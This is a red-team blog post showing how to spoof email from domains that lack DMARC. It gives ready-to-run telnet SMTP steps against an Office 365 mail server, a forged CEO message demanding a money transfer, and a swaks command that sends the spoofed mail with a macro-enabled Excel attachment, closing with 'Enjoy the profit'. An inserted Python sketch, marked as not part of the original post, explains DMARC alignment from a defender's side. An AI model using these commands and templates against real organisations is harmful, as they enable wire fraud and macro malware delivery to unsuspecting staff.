Long Live DMARC - Email Spoof issues

Spoofing emails when SPF is present but DMARC is not, which lets an attacker forge the sender


Last updated 3 years ago


Recently, during my research, I came across an organization that was using O365 for email. While I skipped over the fact that they didn't have DMARC during the initial recon, it clicked for me when I was reading over my notes.

Background Info:

Email Provider: O365

SPF: exists (v=spf1 ip4:192.168.0.0/24 -all)

DMARC: does not exist

If you don't like nslookup commands, you can check this on MXToolbox as well.

TIP: If a DMARC record exists, check whether p=none is set. p=none means the DMARC policy is monitor-only: neither quarantine nor reject is enforced.

Technical Background

An email consists of two parts: the SMTP envelope and the message data. Below is a pictorial representation.

SPF: verifies the HELO/EHLO identity

DKIM: verifies the DKIM-Signature header of the sender

DMARC: checks alignment between the 'From' header and 'MAIL FROM'

In conclusion, if DMARC isn't present, there is no way to verify the alignment between the 'MAIL FROM' and 'From' fields. If the receiving user only sees 'From', then an attacker is free to forge anything. Simply put, an attacker can put any email address they like in the 'From' field, and the receiving user will see the email as coming from the forged 'From' address.
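To make the alignment check concrete, here is an added Python sketch (not part of the original post) that parses a DMARC record and evaluates SPF identifier alignment for the forged 'From' / 'MAIL FROM' pair used in this post, showing what a receiver does with no record, with p=none and with p=reject. The DMARC records are constructed, organizational-domain reduction is simplified to the last two labels (real receivers use the Public Suffix List), and DKIM alignment is left out because the spoofed message carries no signature.

```python
import re

# Constructed DMARC records for comparison; these are not real DNS answers.
DMARC_RECORDS = {
    "orgname.com": None,  # no record at all, as found on the target in this post
    "none.example": "v=DMARC1; p=none; rua=mailto:dmarc@none.example",
    "reject.example": "v=DMARC1; p=reject; adkim=s; aspf=s",
}

def parse_dmarc(record):
    """Split a DMARC TXT record into tag=value pairs; None if absent or not a DMARC1 record."""
    if not record:
        return None
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1" or "p" not in tags:
        return None
    tags.setdefault("aspf", "r")  # relaxed SPF alignment is the default
    return tags

def org_domain(domain):
    """Simplified organizational domain (last two labels); real receivers use the Public Suffix List."""
    return ".".join(domain.lower().split(".")[-2:])

def aligned(header_domain, auth_domain, mode):
    """Identifier alignment: strict ('s') needs an exact match, relaxed ('r') the same org domain."""
    if mode == "s":
        return header_domain.lower() == auth_domain.lower()
    return org_domain(header_domain) == org_domain(auth_domain)

def addr_domain(addr):
    """Domain part of 'Name <user@domain>' or 'user@domain'."""
    match = re.search(r"@([A-Za-z0-9.-]+)", addr)
    return match.group(1).lower() if match else ""

def evaluate(from_header, mail_from, spf_pass, record):
    """Disposition a receiver applies, using SPF alignment only (no DKIM signature present)."""
    tags = parse_dmarc(record)
    if tags is None:
        return "no DMARC: From header never compared with MAIL FROM"
    if spf_pass and aligned(addr_domain(from_header), addr_domain(mail_from), tags["aspf"]):
        return "pass"
    return {"none": "fail: monitor only (p=none)",
            "quarantine": "fail: quarantine",
            "reject": "fail: reject"}.get(tags["p"].lower(), "fail: unknown policy")
```

Running evaluate() with the post's 'From' of ceo@orgname.com and 'MAIL FROM' of attacker@fook.redteam.cafe shows that a valid SPF pass on the attacker's own domain is irrelevant once a record with p=reject exists: the identifiers do not align, so the message is rejected.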

Current Exploitation Methods:

Quick guides I found on exploiting the missing-DMARC issue, also known as "SPF bypass", are listed under References below.

Info extracted from the above methods

So, to spoof, the following actions must be performed:

Step 1: Buy a domain or configure a subdomain (I'll be using a subdomain: fook.redteam.cafe).

Step 2: Get a VPS that allows SMTP. I'm using DigitalOcean.

Step 3: Set the right SPF record on the domain. Example: v=spf1 mx a ip4:<DigitalOcean IP> -all

Step 4: Connect via telnet to the target SMTP server. My target org used Office 365, so we'll telnet to orgname-com.mail.protection.outlook.com

telnet orgname-com.mail.protection.outlook.com 25

Step 5: Perform actions as below

ehlo fook.redteam.cafe
MAIL FROM: attacker@fook.redteam.cafe
RCPT To: victim@orgname.com
data
from: "CEO ORG" <ceo@orgname.com>
to: <victim@orgname.com>
subject: transfer money urgently

Hey send me money at bank account 123456789

.

Enjoy the profit

Missing Automation 🤷‍♂️

So all this is good and everything, but where the hell is the automation? As a red teamer, I asked myself these questions:

  1. Where is automation? Do I send an email by telnet to all my victims? That's boring

  2. How do I send an HTML email?

  3. How do I send an attachment with my email?

After looking at many telnet automation scripts, I was frustrated. I decided to use SWAKS, the Swiss Army knife for email.

Instead of doing loads of telnet and manual encoding of messages, let's run this sweet command and be done:

./swaks --ehlo fook.redteam.cafe --from attacker@mail.redteam.cafe --to victim@orgname.com --server orgname-com.mail.protection.outlook.com --h-From '"CEO  ORG" <ceo@orgname.com>' --attach-type text/html --attach-body @Mail-Template.html --attach macroexcel.xlsm --attach-type text/html

Is this something new?

Probably not. You must have heard about this 100 years ago.

How can I find more issues in the email delivery system?

Super Useful Research

While doing some google-fu, I found two very useful projects to test mail delivery systems.

These projects will help you discover issues in mail delivery systems. You may even get a 0-day in your pocket 🤷‍♂️ if you choose the right target. Shhhhh

References:

Quick guides on the SPF bypass issue:
https://github.com/Rices/spf-bypass
https://o365info.com/how-to-simulate-spoof-e-mail-attack-and-bypass-spf-sender-verification-part2-of-2/

Amazing Black Hat talk:
https://www.blackhat.com/us-20/briefings/schedule/#you-have-no-idea-who-sent-that-email--attacks-on-email-sender-authentication-19902

Well, there is of course the manual way to dig for SPF, DMARC and DKIM. You can also just go to caniphish.com for a quicker way in.

MailSploit - https://github.com/pwnsdx/Mailsploit

espoofer - https://github.com/chenjj/espoofer
[Figures from the original page, images not preserved: "Email Spoof Attack Components"; "DMARC of the domain doesn't exist"; "Breakdown of two parts of an email"; "SPF and DKIM verification fields"]